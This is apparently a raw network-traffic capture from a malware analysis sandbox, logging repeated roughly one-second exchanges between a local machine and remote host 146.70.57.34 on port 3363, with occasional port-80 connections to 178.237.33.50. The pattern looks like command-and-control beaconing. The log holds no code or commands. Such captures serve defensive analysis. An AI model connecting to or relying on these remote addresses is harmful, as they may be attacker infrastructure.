                                        Jul 27, 2024 11:39:07.181366920 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:07.592251062 CEST4971880192.168.2.6178.237.33.50
                                        Jul 27, 2024 11:39:08.168565989 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:08.169903040 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:08.182135105 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:08.904810905 CEST4971880192.168.2.6178.237.33.50
                                        Jul 27, 2024 11:39:10.106375933 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:10.107564926 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:10.109292984 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:10.109349012 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:10.111080885 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:10.111124992 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:10.112313032 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:10.112346888 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:10.115791082 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:11.217736006 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:11.219647884 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:11.227174044 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:11.404769897 CEST4971880192.168.2.6178.237.33.50
                                        Jul 27, 2024 11:39:12.296111107 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:12.298317909 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:12.303251028 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:13.236048937 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:13.238073111 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:13.243077040 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:14.239317894 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:14.240832090 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:14.245660067 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:15.248235941 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:15.249999046 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:15.254810095 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:16.254442930 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:16.255753040 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:16.260674000 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:16.404782057 CEST4971880192.168.2.6178.237.33.50
                                        Jul 27, 2024 11:39:17.259016037 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:17.260138035 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:17.265217066 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:18.281203032 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:18.282582998 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:18.288012981 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:19.308573961 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:19.313129902 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:19.319077969 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:20.302544117 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:20.303703070 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:20.311461926 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:21.311069965 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:21.312285900 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:21.318608046 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:22.314609051 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:22.315758944 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:22.321129084 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:23.337785006 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:23.338958025 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:23.344259977 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:24.345757961 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:24.346893072 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:24.352694035 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:25.348282099 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:25.349617004 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:25.354964972 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:26.092307091 CEST4971880192.168.2.6178.237.33.50
                                        Jul 27, 2024 11:39:26.409138918 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:26.409904957 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:26.690413952 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:26.692522049 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:26.692586899 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:27.378808975 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:27.380198956 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:27.385118008 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:28.376986027 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:28.377526045 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:28.382632017 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:29.399451017 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:29.400501013 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:29.405445099 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:30.397507906 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:30.397977114 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:30.402817011 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:31.600564003 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:31.601010084 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:31.605807066 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:32.421578884 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:32.449760914 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:32.454803944 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:33.426724911 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:33.428363085 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:33.433223963 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:34.441324949 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:34.441900969 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:34.446877956 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:35.526166916 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:35.527512074 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:35.534128904 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:36.449853897 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:36.450325012 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:36.455908060 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:37.465670109 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:37.468254089 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:37.473108053 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:38.465996027 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:38.469326973 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:38.474195957 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:39.477679014 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:39.478168964 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:39.483002901 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:40.478430033 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:40.481482029 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:40.486529112 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:41.499927044 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:41.500492096 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:41.507040977 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:42.527446032 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:42.527977943 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:42.533286095 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:43.526040077 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:43.532890081 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:43.537961960 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:44.568001032 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:44.568547010 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:44.573442936 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:45.552586079 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:45.556504011 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:45.561377048 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:46.575787067 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:46.576379061 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:46.581410885 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:47.571355104 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:47.589219093 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:47.595181942 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:48.585793018 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:48.589390039 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:48.597989082 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:49.615058899 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:49.615524054 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:49.620445967 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:50.605542898 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:50.606009960 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:50.611001015 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:51.597600937 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:51.598067045 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:51.603094101 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:52.619065046 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:52.621402025 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:52.626403093 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:53.619062901 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:53.619632006 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:53.626921892 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:54.644731045 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:54.649374962 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:54.654405117 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:55.647353888 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:55.647754908 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:55.652756929 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:56.643203974 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:56.643723011 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:56.648637056 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:57.690161943 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:57.690843105 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:57.700426102 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:58.684490919 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:58.685014963 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:58.690155983 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:59.685772896 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:59.688435078 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:59.693377972 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:00.709592104 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:00.713831902 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:00.718684912 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:01.729799032 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:01.730468035 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:01.735409021 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:02.730629921 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:02.731148958 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:02.736799955 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:03.749361038 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:03.750103951 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:03.754951954 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:04.762790918 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:04.763824940 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:04.768815994 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:05.750751019 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:05.751389980 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:05.756386995 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:06.757591963 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:06.763247013 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:06.768266916 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:07.784060955 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:07.784749031 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:07.789757967 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:08.783380985 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:08.790057898 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:08.795007944 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:09.790770054 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:09.791393042 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:09.796334982 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:10.810550928 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:10.817300081 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:10.822424889 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:11.889077902 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:11.889986992 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:11.895728111 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:12.812621117 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:12.816968918 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:12.821978092 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:13.921726942 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:13.922291994 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:13.928374052 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:15.160325050 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:15.160432100 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:15.160926104 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:15.161446095 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:15.166244030 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:15.852324009 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:15.853032112 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:15.857811928 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:16.860323906 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:16.860825062 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:16.866826057 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:17.858690977 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:17.859505892 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:17.864355087 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:18.879224062 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:18.883261919 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:18.889775038 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:19.879534006 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:19.880172014 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:19.885394096 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:20.892263889 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:20.892708063 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:20.897522926 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:22.304132938 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:22.304332018 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:22.304405928 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:22.304605961 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:22.311455965 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:22.906219006 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:22.906665087 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:22.914041996 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:23.912122965 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:23.912750959 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:23.917650938 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:24.920181036 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:24.920790911 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:24.925882101 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:25.938330889 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:25.938754082 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:25.944324970 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:26.930639029 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:26.931946039 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:26.936888933 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:27.940531015 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:27.941015005 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:27.945843935 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:28.945446014 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:28.945998907 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:28.950891972 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:29.949157000 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:29.949723005 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:29.954585075 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:30.968707085 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:30.973097086 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:30.978140116 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:31.988895893 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:31.989317894 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:31.994129896 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:33.000726938 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:33.005172968 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:33.010242939 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:33.997585058 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:33.998066902 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:34.003007889 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:35.005358934 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:35.013315916 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:35.018405914 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:36.022221088 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:36.022839069 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:36.030420065 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:37.024979115 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:37.032630920 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:37.037620068 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:38.035192013 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:38.035629034 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:38.040725946 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:39.034408092 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:39.039475918 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:39.048274994 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:40.036900043 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:40.037269115 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:40.042229891 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:41.062843084 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:41.063977957 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:41.073575974 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:42.077193022 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:42.077805996 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:42.089498997 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:43.062711000 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:43.063656092 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:43.068797112 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:44.065049887 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:44.065587044 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:44.070797920 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:45.071629047 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:45.073615074 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:45.078541040 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:46.085062981 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:46.085649967 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:46.090650082 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:47.103538990 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:47.105060101 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:47.110109091 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:48.117197037 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:48.117739916 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:48.122900963 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:49.145747900 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:49.146646023 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:49.153060913 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:50.153354883 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:50.153794050 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:50.163853884 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:51.151676893 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:51.153057098 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:51.158097029 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:52.165956974 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:52.166543961 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:52.171457052 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:53.252408981 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:53.252923965 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:53.258187056 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:54.165230036 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:54.175133944 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:54.180054903 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:55.178885937 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:55.181056023 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:55.190110922 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:56.181054115 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:56.181560993 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:56.186515093 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:57.216710091 CEST336349716146.70.57.34192.168.2.6
